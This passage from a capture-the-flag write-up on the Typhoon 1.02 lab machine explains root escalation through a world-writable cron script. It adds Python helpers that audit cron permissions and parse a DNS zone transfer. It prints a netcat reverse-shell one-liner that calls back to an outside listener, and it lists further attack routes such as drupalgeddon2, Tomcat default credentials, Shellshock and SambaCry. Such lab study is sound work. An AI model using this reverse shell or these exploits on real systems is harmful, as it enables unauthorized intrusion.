Access: (6755/-rwsr-sr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2023-07-02 21:09:27.916683000 +0300
Modify: 2023-07-02 20:33:01.148683000 +0300
Change: 2023-07-02 20:33:01.152683000 +0300
Birth: -

stat shows no birth time. A copy made by running the script by hand belongs to the user who ran it, so its setuid bit grants nothing; a root-owned copy can only come from a root process executing the script, which points to a scheduled job (there is nothing in /etc/crontab, so root's own crontab or /etc/cron.d would be the place to look). The same mechanism delivers a reverse shell; write this into /tab/script.sh, start the listener and wait for the job to fire:

echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.27.187 8888 >/tmp/f" > script.sh
nc -vlp 8888
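
As an added example (not code from the write-up), the following Python script automates the check that explains this finding: it parses system-crontab lines, pulls out the absolute paths each root job touches, and reports any of them that a non-root user can modify. The crontab text is constructed: the /etc/crontab lines are the ones shown earlier, while the entries for /tab/script.sh, backup.sh and startup.sh are hypothetical (the write-up infers a root job for /tab/script.sh but never locates it). The stat table is likewise constructed, except that /tab/script.sh is root-owned mode 0777 as ls showed.

```python
# Added example (not from the write-up): cross-check cron jobs against file
# ownership and permissions. A script that cron executes as root but that a
# non-root user can modify is a privilege escalation. The crontab text below
# is constructed: the /etc/crontab lines are the ones shown above, the
# entries for /tab/script.sh, backup.sh and startup.sh are hypothetical, as
# is the stat table (except /tab/script.sh, which ls showed as root 0777).
import re
import stat
from typing import Dict, List, NamedTuple, Optional, Tuple


class FileInfo(NamedTuple):
    uid: int
    gid: int
    mode: int  # permission bits only, e.g. 0o777


# Five time fields (or an @keyword), then the user, then the command.
CRON_LINE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(\S+)\s+(.+?)\s*$")
# Absolute paths inside a command; a bare "/" (as in "cd /") is not one.
ABS_PATH = re.compile(r"""(?<!\S)/[^\s;&|()'"]+""")

CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root /tab/script.sh
*/5 * * * * typhoon /home/typhoon/backup.sh
@reboot root /usr/local/sbin/startup.sh
"""

FILES: Dict[str, FileInfo] = {
    "/etc/cron.hourly": FileInfo(0, 0, 0o755),
    "/etc/cron.daily": FileInfo(0, 0, 0o755),
    "/usr/sbin/anacron": FileInfo(0, 0, 0o755),
    "/tab/script.sh": FileInfo(0, 0, 0o777),          # as seen on the box
    "/home/typhoon/backup.sh": FileInfo(1000, 1000, 0o755),
    "/usr/local/sbin/startup.sh": FileInfo(0, 1000, 0o775),
}


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """(user, command) for each job line of a system crontab (/etc/crontab,
    /etc/cron.d/*). Comments, blank lines and VAR=value lines are skipped."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or re.match(r"^\s*\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group(2), m.group(3)))
    return jobs


def modifiable_by_non_root(info: FileInfo) -> Optional[str]:
    """Why a non-root user could change this file, or None if only root can."""
    if info.uid != 0:
        return f"owned by uid {info.uid}"
    if info.mode & stat.S_IWOTH:
        return "world-writable"
    if info.mode & stat.S_IWGRP and info.gid != 0:
        return f"group-writable by gid {info.gid}"
    return None


def hijackable_root_jobs(crontab: str, files: Dict[str, FileInfo]) -> List[Tuple[str, str]]:
    """(path, reason) for every absolute path referenced by a root job that a
    non-root user can modify. Paths absent from `files` are ignored here; on a
    live host a missing path inside a writable directory is also a finding."""
    findings = []
    for user, command in parse_crontab(crontab):
        if user != "root":
            continue
        for path in ABS_PATH.findall(command):
            info = files.get(path)
            reason = modifiable_by_non_root(info) if info else None
            if reason:
                findings.append((path, reason))
    return findings


if __name__ == "__main__":
    for path, reason in hijackable_root_jobs(CRONTAB, FILES):
        print(f"root job runs {path}: {reason}")
```

On a live host the FILES table would come from os.stat() on each extracted path (st_uid, st_gid and stat.S_IMODE(st_mode)); the job owned by typhoon is deliberately not reported because hijacking it gains nothing beyond what typhoon already has. Directories on the way to each script deserve the same check, since a writable parent lets an attacker replace the file outright.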

Addendum

I tried drupal_drupalgeddon2; with msf it gives a shell directly. The following are methods from other write-ups that I did not try:

  • OpenSSH 2.3 < 7.7 - Username Enumeration, then brute force the users with hydra
  • phpMoAdmin information disclosure
  • LotusCMS exploitation: the standalone script failed, probably because nc on the target lacks -e, but the write-up succeeded with msf
  • Tomcat: the default credentials tomcat/tomcat log into the manager; then use tomcat_mgr_upload
  • Shellshock: a nikto scan finds /cgi-bin/test.sh vulnerable to Shellshock
  • postgres_login brute force; after logging in, use file read/write to obtain a reverse shell
  • SambaCry, the "Linux EternalBlue": Samba 3.5+ < 4.6.4 / < 4.5.10 / < 4.4.14, CVE-2017-7494
  • DNS zone transfer on port 53: it reveals subdomains, and one of them hosts WebCalendar v1.2.4 (08 Aug 2011), which has known vulnerabilities

    ┌──(kali㉿kali)-[~/Downloads/typhoon]
    └─$ dig @192.168.56.122 -t axfr typhoon.local

    DiG 9.18.13-1-Debian @192.168.56.122 -t axfr typhoon.local
    ; (1 server found)
    ;; global options: +cmd
    typhoon.local. 3600 IN SOA ns.prismacsi.com. enes.prismacsi.com. 1 3600 600 86400 3600
    typhoon.local. 3600 IN NS ns1.typhoon.local.
    typhoon.local. 3600 IN NS ns2.typhoon.local.
    calendar.typhoon.local. 3600 IN CNAME wwww.typhoon.local.
    flag.typhoon.local. 3600 IN TXT "g00d_j0b_typh00n!"
    ns1.typhoon.local. 3600 IN A 192.168.1.5
    ns2.typhoon.local. 3600 IN A 192.168.1.6
    prisma.typhoon.local. 3600 IN A 192.168.1.8
    secretmessage.typhoon.local. 3600 IN TXT "prismacsi.com"
    www.typhoon.local. 3600 IN A 192.168.1.7
    typhoon.local. 3600 IN SOA ns.prismacsi.com. enes.prismacsi.com. 1 3600 600 86400 3600
    ;; Query time: 0 msec
    ;; SERVER: 192.168.56.122#53(192.168.56.122) (TCP)
    ;; WHEN: Sun Jul 02 22:36:41 EDT 2023
    ;; XFR size: 11 records (messages 1, bytes 338)
  • Reference: P5 利用Vulhub复现漏洞 - DNS域传送漏洞 (CSDN blog by 在下小黄): reproducing the DNS zone-transfer vulnerability on tcp/udp 53 with Vulhub, and how to fix it
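
As an added example (not code from the write-up), the following Python script turns a dig AXFR dump like the one above into hosts-file lines for the discovered names, lists the TXT records, and flags CNAMEs whose target has no A record in the zone (calendar.typhoon.local points at the misspelled wwww.typhoon.local). AXFR_OUTPUT is copied from the zone transfer above; the function names are this example's own.

```python
# Added example (not from the write-up): turn a `dig -t axfr` dump into
# hosts-file lines and flag TXT records and dangling CNAMEs. AXFR_OUTPUT is
# copied from the zone transfer above; the function names are this example's.
import re
from typing import Dict, List, Tuple

# owner  ttl  IN  type  rdata
RR = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.*)$")

AXFR_OUTPUT = """\
typhoon.local. 3600 IN SOA ns.prismacsi.com. enes.prismacsi.com. 1 3600 600 86400 3600
typhoon.local. 3600 IN NS ns1.typhoon.local.
typhoon.local. 3600 IN NS ns2.typhoon.local.
calendar.typhoon.local. 3600 IN CNAME wwww.typhoon.local.
flag.typhoon.local. 3600 IN TXT "g00d_j0b_typh00n!"
ns1.typhoon.local. 3600 IN A 192.168.1.5
ns2.typhoon.local. 3600 IN A 192.168.1.6
prisma.typhoon.local. 3600 IN A 192.168.1.8
secretmessage.typhoon.local. 3600 IN TXT "prismacsi.com"
www.typhoon.local. 3600 IN A 192.168.1.7
typhoon.local. 3600 IN SOA ns.prismacsi.com. enes.prismacsi.com. 1 3600 600 86400 3600
;; Query time: 0 msec
"""

Record = Tuple[str, str, str]  # (owner name, type, rdata), names without trailing dot


def parse_axfr(text: str) -> List[Record]:
    """Parse dig's AXFR listing. Comment lines (';') and anything that is not
    a resource record are skipped; the SOA that dig prints twice (it opens
    and closes the transfer) is kept once."""
    records: List[Record] = []
    for line in text.splitlines():
        if line.startswith(";"):
            continue
        m = RR.match(line)
        if not m:
            continue
        rec = (m.group(1).rstrip("."), m.group(3), m.group(4).strip())
        if rec not in records:
            records.append(rec)
    return records


def hosts_lines(records: List[Record]) -> List[str]:
    """'ip name' lines for A records, plus CNAMEs resolved within the zone."""
    a = {name: ip for name, rtype, ip in records if rtype == "A"}
    lines = [f"{ip} {name}" for name, ip in a.items()]
    for name, rtype, target in records:
        if rtype == "CNAME" and target.rstrip(".") in a:
            lines.append(f"{a[target.rstrip('.')]} {name}")
    return lines


def dangling_cnames(records: List[Record]) -> List[str]:
    """CNAMEs whose target has no A record in the zone (typo or stale entry)."""
    a = {name for name, rtype, _ in records if rtype == "A"}
    return [name for name, rtype, target in records
            if rtype == "CNAME" and target.rstrip(".") not in a]


def txt_records(records: List[Record]) -> Dict[str, str]:
    """TXT rdata with the surrounding quotes removed."""
    return {name: data.strip('"') for name, rtype, data in records if rtype == "TXT"}


if __name__ == "__main__":
    recs = parse_axfr(AXFR_OUTPUT)
    print("\n".join(hosts_lines(recs)))
    print("dangling:", dangling_cnames(recs))
    print("txt:", txt_records(recs))
```

The hosts lines are what you would append to /etc/hosts before browsing the virtual hosts one by one; the zone's A records point at 192.168.1.x, so on this lab network they have to be mapped to the target's actual address instead.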


TYPHOON_1_02 target machine
https://i3eg1nner.github.io/2023/07/3e56f363190c.html
Author
I3eg1nner
Published
2 July 2023
License